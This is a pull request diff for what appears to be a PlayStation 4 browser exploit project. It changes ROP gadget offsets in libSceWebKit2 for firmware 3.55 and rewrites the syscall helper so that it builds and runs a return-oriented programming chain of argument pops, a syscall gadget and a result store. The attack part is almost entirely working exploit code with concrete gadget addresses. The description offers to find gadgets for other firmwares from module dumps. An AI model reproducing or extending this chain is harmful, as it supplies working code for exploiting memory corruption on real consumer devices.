### PR TITLE
changed the way syscalls are made so we directly call them instead of…

### DIFF
--- a/gadgets.js
+++ b/gadgets.js
@@ -70,20 +70,25 @@ var generateGadgetMap = function()
 
     '3.55':
     {
-      'pop rsi':  getGadget('libSceWebKit2', 0xB9EBB),
-      'pop rdi':  getGadget('libSceWebKit2', 0x113991),
-      'pop rax':  getGadget('libSceWebKit2', 0x1C6AB),
-      'pop rcx':  getGadget('libSceWebKit2', 0x3CA9FD),
-      'pop rdx':  getGadget('libSceWebKit2', 0x1AFA),
-      'pop r8':   getGadget('libSceWebKit2', 0x4C13BD),
-      'pop r9':   getGadget('libSceWebKit2', 0xEE0A8F),
       'pop rsp':  getGadget('libSceWebKit2', 0x376850),
+      'pop rcx; pop rcx': getGadget('libSceWebKit2', 0x2017674),
+      'pop rcx': getGadget('libSceWebKit2', 0x1B49034),
+      'pop rdi': getGadget('libSceWebKit2', 0x142f00a),
+      'pop rsi': getGadget('libSceWebKit2', 0x1d7342c),
+      'pop rdx': getGadget('libSceWebKit2', 0x1b3ddf2),
+      'pop rax': getGadget('libSceWebKit2', 0x2017183),
+      'pop r8': getGadget('libSceWebKit2', 0x1036d79),
+      'pop r9': getGadget('libSceWebKit2', 0xee0a8f),
 
+      'syscall':  getGadget('libSceWebKit2', 0x2224BDA),
       'mov rax, rdi':             getGadget('libSceWebKit2', 0x57C3),
       'mov qword ptr [rdi], rax': getGadget('libSceWebKit2', 0x11FC37),
       'mov qword ptr [rdi], rsi': getGadget('libSceWebKit2', 0x4584D0),
-
       'jmp addr': getGadget('libSceWebKit2', 0x86D4F4),
+      'xchg rax, rsp; dec dword ptr [rax - 0x77]': getGadget('libSceWebKit2', 0xd5d841),
+      'add dword ptr [rax - 0x77], ecx': getGadget('libSceWebKit2', 0xd3d040),
+      'mov qword ptr [rdi], rax': getGadget('libSceWebKit2', 0x28e0e7),
+      'mov rax, qword ptr [rax]': getGadget('libSceWebKit2', 0x2723f3)
     },
 
     '3.70':

--- a/index.html
+++ b/index.html
@@ -253,8 +253,35 @@
           throw new Error("System call map does not contain an index for this syscall!");
         }
 
-        return p.call(libkernel.add32(off), rdi, rsi, rdx, rcx, r8, r9);
-      }
+        var chain = new rop(p);
+        chain.push(window.gadgets["pop rdi"]);
+        chain.push(rdi);
+        chain.push(window.gadgets["pop rsi"]);
+        chain.push(rsi);
+        chain.push(window.gadgets["pop rdx"]);
+        chain.push(rdx);
+        chain.push(window.gadgets["pop rcx"]);
+        chain.push(rcx);
+        chain.push(window.gadgets["pop r8"]);
+        chain.push(r8);
+        chain.push(window.gadgets["pop r9"]);
+        chain.push(r9);
+        chain.push(window.gadgets["pop rax"]);
+        chain.push(sysc);
+        chain.push(window.gadgets["syscall"]);
+
+        chain.push(window.gadgets["pop rdi"]);
+        chain.push(chain.ropChainPtr.add32(0x3ff8));
+        chain.push(window.gadgets["mov qword ptr [rdi], rax"]);
+        chain.push(window.gadgets["pop rax"]);
+        chain.push(p.leakval(0x41414242));
+        if (chain.run().low != 0x41414242) throw new Error("unexpected rop behaviour");
+
+        /*
+          Originally for some reason, it will read in hex, so .toString(10)
+          converts back to decimal.
+        */
+        return p.read8(chain.ropChainPtr.add32(0x3ff8)).toString(10);      }
 
       p.readstr = function(addr){
         var addr_ = addr.add32(0);


### PR DESCRIPTION
… using libkernel. only works on 3.55 due to lack of gadgets on other firmwares

i'd be more than happy to supply the required gadgets for other firmwares if someone sends me module dumps


the diff is all fucked up due to newline fuckups and i just couldn't get the shit to work the way it's supposed to, but the only changed areas are the p.syscall function in index.html (lifted pretty much straight outta your code in the 3.55 playground) and the 3.55 gadgets in gadget.js (also lifted from the playground)